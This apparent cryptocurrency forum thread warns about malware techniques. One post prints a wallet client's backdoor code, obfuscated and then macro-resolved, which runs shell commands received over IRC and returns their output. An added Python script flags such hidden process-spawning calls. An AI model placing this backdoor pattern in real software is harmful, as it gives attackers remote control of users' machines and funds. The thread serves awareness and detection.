erichall
|
|
April 03, 2018, 11:43:32 PM |
|
It does seem to get worse.
But the best thing you can do to start with in protecting your funds is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.
|
|
|
|
jaymor11
Newbie
Offline
Activity: 88
Merit: 0
|
|
April 04, 2018, 02:52:06 AM Last edit: April 04, 2018, 03:56:42 AM by jaymor11 |
|
Malicious software, or “malware” for short, is a broad class of software built with malicious intent. To identify it, I will tell you how. A newbie asks for the latest wallet, or wallet that doesn’t have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly. The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later). The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link. Those were just examples of how they used it. So think before acting.
|
|
|
|
sudnokpok
|
|
April 04, 2018, 07:09:51 AM |
|
Yeah, be careful what you are opening. I had a problem once and hardly fixed it. These malware infections are very dangerous. Every miner should know that.
|
|
|
|
MashaVik
Newbie
Offline
Activity: 122
Merit: 0
|
|
April 05, 2018, 06:33:31 PM |
|
Wow! Thanks for the info! Excellent data! Carefully study this subject, and I take my notes!
|
|
|
|
ArunV10
Newbie
Offline
Activity: 3
Merit: 0
|
|
April 06, 2018, 03:22:06 AM |
|
Very interesting read! Thanks!
|
|
|
|
laserfocused
|
|
April 07, 2018, 12:18:16 AM |
|
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.

Here is the relevant source code:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

Here is the source code with macros resolved:

    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // Backdoor: the line, from the first occurrence of vWords[4] onward,
        // is passed to popen() and run as a shell command
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // Sender's nick: vWords[0] without its first character, cut at '!'
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // The command output is sent back to that nick as a PRIVMSG
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thanks for posting this. There is always something that we have to look out for.
|
|
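An added example, not part of the original thread or of the coin's source: a small source audit that resolves object-like `#define` aliases before searching for process-spawning calls, which is what a plain search for `popen` misses in the listing above. The `#define` lines in `SAMPLE` are an assumption inferred from the macro-resolved listing (the page does not show them), and the `RISKY` list is illustrative.

```python
import re

# Process-spawning APIs worth a manual look in a wallet's network code (illustrative list).
RISKY = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
         "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
DEFINE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.+?)\s*$')  # object-like macros only
IDENT = re.compile(r'[A-Za-z_]\w*')
STRING = re.compile(r'"(?:\\.|[^"\\])*"')

def collect_macros(text):
    """Map each object-like macro name to its replacement text."""
    return {m.group(1): m.group(2)
            for m in map(DEFINE.match, text.splitlines()) if m}

def expand(line, macros, depth=8):
    """Substitute macros repeatedly so chained aliases are resolved as well."""
    for _ in range(depth):
        new = IDENT.sub(lambda m: macros.get(m.group(0), m.group(0)), line)
        if new == line:
            break
        line = new
    return line

def audit(text):
    """Return (line_no, risky_names, shown_line) for alias definitions and uses."""
    macros = collect_macros(text)
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        # A #define is checked as written; any other line is expanded first.
        shown = line if DEFINE.match(line) else expand(line, macros)
        code = STRING.sub('""', shown)  # names inside string literals do not count
        hits = sorted(set(IDENT.findall(code)) & RISKY)
        if hits:
            findings.append((no, hits, shown.strip()))
    return findings

# Constructed sample: the #define lines are assumed, inferred from the
# macro-resolved listing in the post; the page does not show them.
SAMPLE = '''\
#define CLine FILE
#define CRead popen
#define CFree pclose
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
'''
FINDINGS = audit(SAMPLE)
```

Each finding carries the line number, the API names it resolved to, and the expanded line, so both the alias definition and its use are surfaced for manual review.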
|
|
cemungut
Member
Offline
Activity: 125
Merit: 10
|
|
April 07, 2018, 07:34:26 AM |
|
Information so useful that we can secure the wallet from the virus that will cause a big problem later; therefore we should be able to find the right solution to prevent it by making good security.
|
|
|
|
cryptojaymark
Newbie
Offline
Activity: 98
Merit: 0
|
|
April 07, 2018, 09:30:40 AM |
|
Thanks this was very informative. and inform to us..
|
|
|
|
sayboo999
Newbie
Offline
Activity: 209
Merit: 0
|
|
April 08, 2018, 09:02:19 PM |
|
Hello) My first wallet was hacked and now I am very cautious ... I have installed a firewall; will it help to protect my savings ...?
|
|
|
|
supremo666
Newbie
Offline
Activity: 266
Merit: 0
|
|
April 09, 2018, 11:36:36 AM |
|
Thanks for the information ... But can you please give us the exact name of the coins ... Thank you !!!
|
|
|
|
aedankreios
Jr. Member
Offline
Activity: 182
Merit: 1
|
|
April 10, 2018, 12:11:20 PM |
|
Thank you for letting us know this information; it will really help individuals to secure their accounts. Just avoid the things you find suspicious.
|
|
|
|
sudnokpok
|
|
April 11, 2018, 08:39:11 AM |
|
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
|
|
|
|
Legion381
Newbie
Offline
Activity: 19
Merit: 0
|
|
April 11, 2018, 03:44:03 PM |
|
Seems very good
|
|
|
|
tonyt25
Newbie
Offline
Activity: 10
Merit: 0
|
|
April 12, 2018, 09:00:44 AM |
|
Wow, I am really loving this platform.☺️😂😃😁
|
|
|
|
t25tony
Newbie
Offline
Activity: 3
Merit: 0
|
|
April 12, 2018, 09:06:47 AM |
|
Nice 👍 job against this malware, fell victim on a couple of occasions and it is not a nice experience. Good job 👏🏼 guys
|
|
|
|
altcoiner
|
|
April 12, 2018, 09:23:40 AM |
|
As much as we like freebies, we should be careful of the applications we install on our systems, especially hacked copies of an application, because most of the hackers want valuable information back from us, which we give to them without knowing. My first BTC wallet balance was emptied by the Zbot/Zeus trojan because I saved the private key and password on my desktop. I learnt my lesson the hard way.
|
|
|
|
always2late
Newbie
Offline
Activity: 62
Merit: 0
|
|
April 13, 2018, 06:29:16 AM |
|
You know, I'm really glad that I'm seeing this. I lost a bunch of money when https://coinsmarkets.com went down, and I felt like an idiot. I've been in the space too long to be making noob mistakes like leaving your coins on the exchange, but at the same time, I've also been in the space for so long that I don't trust every random developer who makes a coin. With that said, I still feel dumb for my choices, not because I left coins in general but because the coins that I had on the exchange were coins that I had wallets installed for. Main point for this post is that we're getting to the point where, for those of us who really understand what's going on but aren't software devs ourselves, it's scary AF to get into any of these non-major platforms.
|
|
|
|
zmeddy
|
|
April 13, 2018, 11:03:13 AM |
|
Omg, thanks for the information, I'm always very afraid of losing my data or getting a virus, just cured the computer from a miner who was almost six months mining on my computer ((
|
|
|
|
alex massi
Newbie
Offline
Activity: 89
Merit: 0
|
|
April 18, 2018, 05:46:47 AM |
|
Thanks, that is really serious. I mean, copying links would do that; we all should be careful.
|
|
|
|
sudnokpok
|
|
April 18, 2018, 05:50:14 AM |
|
In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks. I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install.
|
|
|
|
|